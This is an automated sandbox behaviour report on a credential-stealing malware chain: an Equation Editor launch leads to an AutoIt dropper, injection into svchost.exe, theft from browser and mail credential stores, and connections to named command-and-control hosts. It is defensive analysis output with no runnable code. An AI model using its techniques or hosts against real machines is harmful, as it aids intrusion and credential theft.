          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044E879 FindFirstFileExA,7_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040783C FindFirstFileW,FindNextFileW,7_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_10006580 FindFirstFileExA,7_2_10006580
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00407C97
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_009F42DE
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2278
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2465
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2371
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A6EAA2 BlockInput,3_2_00A6EAA2
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A22622
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_009F42DE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356088E mov edx, dword ptr fs:[00000030h]2_2_0356088E
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A14CE8 mov eax, dword ptr fs:[00000030h]3_2_00A14CE8
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00193520 mov eax, dword ptr fs:[00000030h]3_2_00193520
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00193580 mov eax, dword ptr fs:[00000030h]3_2_00193580
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00191F00 mov eax, dword ptr fs:[00000030h]3_2_00191F00
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D64CE8 mov eax, dword ptr fs:[00000030h]6_2_00D64CE8
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00113520 mov eax, dword ptr fs:[00000030h]6_2_00113520
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00113580 mov eax, dword ptr fs:[00000030h]6_2_00113580
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00111F00 mov eax, dword ptr fs:[00000030h]6_2_00111F00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004432B5 mov eax, dword ptr fs:[00000030h]7_2_004432B5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h]7_2_10004AB4
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00A50B62
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A109D5 SetUnhandledExceptionFilter,3_2_00A109D5
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A22622
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A1083F
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00A10C21
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D609D5 SetUnhandledExceptionFilter,6_2_00D609D5
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00D72622
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D6083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00D6083F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D60C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00D60C21
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00434B47 SetUnhandledExceptionFilter,7_2_00434B47
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004349F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043BB22
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00434FDC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_100060E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10002639
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_10002B1C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.94.53.100 2766Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: geoplugin.net
          Source: C:\Windows\SysWOW64\svchost.exeDomain query: yuahdgbceja.sytes.net
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,7_2_004180EF
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe7_2_004120F7
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00A51201
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00A32BA5
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5B226 SendInput,keybd_event,3_2_00A5B226
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,3_2_00A722DA
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00A50B62
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_00A51663
          Source: CKK.exe, 00000003.00000000.458425358.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, CKK.exe, 00000003.00000003.795866045.0000000002CB1000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000006.00000002.800878386.0000000000E02000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: CKK.exe, deblaterate.exeBinary or memory string: Shell_TrayWnd
          Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
          Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A10698 cpuid 3_2_00A10698
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,7_2_00452036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_004520C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,7_2_00452313
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,7_2_00448404
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0045243C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,7_2_00452543
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00452610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,7_2_0040F8D1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,7_2_004488ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,GetLocaleInfoW,7_2_00451CD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,7_2_00451F50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,7_2_00451F9B
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A2333F GetSystemTimeAsFileTime,3_2_00A2333F
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A4D27A GetUserNameW,3_2_00A4D27A
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,3_2_00A2B952
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_009F42DE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data7_2_0040BA12
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db7_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1592, type: MEMORYSTR
          Source: deblaterate.exeBinary or memory string: WIN_81
          Source: deblaterate.exeBinary or memory string: WIN_XP
